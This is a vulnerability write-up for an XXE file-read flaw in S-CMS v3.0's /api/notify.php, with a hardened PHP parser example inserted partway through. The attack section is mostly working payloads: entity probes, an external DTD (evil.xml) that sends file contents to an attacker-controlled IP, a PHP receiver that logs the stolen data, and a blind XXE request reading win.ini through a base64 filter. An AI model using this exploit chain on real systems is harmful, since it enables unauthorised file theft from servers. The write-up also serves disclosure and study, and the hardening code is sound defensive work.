S-CMS v3.0 XXE Arbitrary File Read Vulnerability
Vulnerability environment: php5.3/5.4
The vulnerability is located in /api/notify.php; the key code is as follows:
The simplexml_load_string function directly parses the XML body passed in the POST request and does not disable entity loading.
Note:
In older versions, simplexml_load_string substitutes entities by default. In newer versions, entities are no longer substituted by default; you need to pass LIBXML_NOENT as the third parameter, for example:

simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT)
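As an added example (not S-CMS code), this is the shape a hardened version of the notify parser would take; the function name parse_notify_xml and the sample payloads are assumptions. It refuses any DOCTYPE, never passes LIBXML_NOENT, and forbids network access during parsing, so both the entity probe above and the blind read below are rejected while a plain notify body still parses.

```php
<?php
// Added example, not part of the original S-CMS code.
// parse_notify_xml is an assumed name for a hardened replacement of the
// simplexml_load_string call in /api/notify.php.

function parse_notify_xml(string $xml): ?SimpleXMLElement
{
    // 1. A payment/notify body never needs a DTD. Every XXE variant in this
    //    writeup depends on a DOCTYPE, so reject the document outright.
    if (stripos($xml, '<!DOCTYPE') !== false) {
        return null;
    }

    // 2. On PHP < 8.0 external entity loading may still be enabled by
    //    default depending on the libxml build; switch it off explicitly.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    libxml_use_internal_errors(true);

    // 3. Do NOT pass LIBXML_NOENT (the flag that made the original code
    //    substitute entities). LIBXML_NONET blocks http:// fetches such as
    //    the evil.xml / xxe.php callbacks during parsing.
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
    libxml_clear_errors();

    return $doc === false ? null : $doc;
}

// Constructed inputs: the internal-entity probe from the writeup and a
// benign notify body that the endpoint should still accept.
$probe = '<?xml version="1.0" encoding="UTF-8"?>'
       . '<!DOCTYPE ANY [<!ENTITY test "this is test">]>'
       . '<root>&test;</root>';
$benign = '<?xml version="1.0"?><root><status>ok</status></root>';

var_dump(parse_notify_xml($probe) === null);           // probe is rejected
var_dump((string) parse_notify_xml($benign)->status);  // benign body parses
```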
XXE entity detection
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY test "this is test">
]>
<root>&test;</root>

See if external entities are supported:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://192.168.211.129:7777">
]>
<r>&sp;</r>

Create a new evil.xml on the attacker server to be loaded remotely:

<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://192.168.211.129/xxe.php?file=%file;'>"> %payload;

xxe.php is used to record the contents of the read file:
<?php
// Append the exfiltrated file contents (the file parameter) to 1.log
file_put_contents("1.log", $_GET['file'] . "\n", FILE_APPEND);
?>

Blind XXE arbitrary file reading
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=c:/windows/win.ini">
<!ENTITY % dtd SYSTEM "http://192.168.211.129/evil.xml">
%dtd;
%send;
]>
<root></root>

After sending the request, a 1.log file is generated on the attacker server and the file has been read successfully.